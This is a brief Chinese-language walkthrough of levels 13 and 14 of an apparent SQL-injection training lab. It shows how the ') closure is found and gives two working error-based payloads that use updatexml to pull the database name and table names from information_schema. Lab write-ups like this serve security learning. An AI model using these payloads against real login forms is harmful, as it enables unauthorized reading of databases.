第十三关:
当输入或者不输入信息时显示登录失败,当账号和密码输入admin,显示登录成功
当在用户名输入'时报错了,仔细看报错信息,可以发现他说我密码这里不对,有个单括号,再猜这里可能有注入点
当输入')基本可以判断出这里的闭合方式为’),浅试一下
嘿,这不就可以了吗
使用order by 测回显,当输入1,2时都可以,输入3开始报错
尝试报错函数
') and updatexml(1,concat(1,(select database())),3)#
好像是成功了,再试试
') and updatexml(1,concat(1,(select group_concat(table_name)from information_schema.tables where table_schema='security')),3)#
接下来就简单了,和之前的一样一样的。。。
第十四关:
这不和之前的一样,换个闭合方式就是一关🤣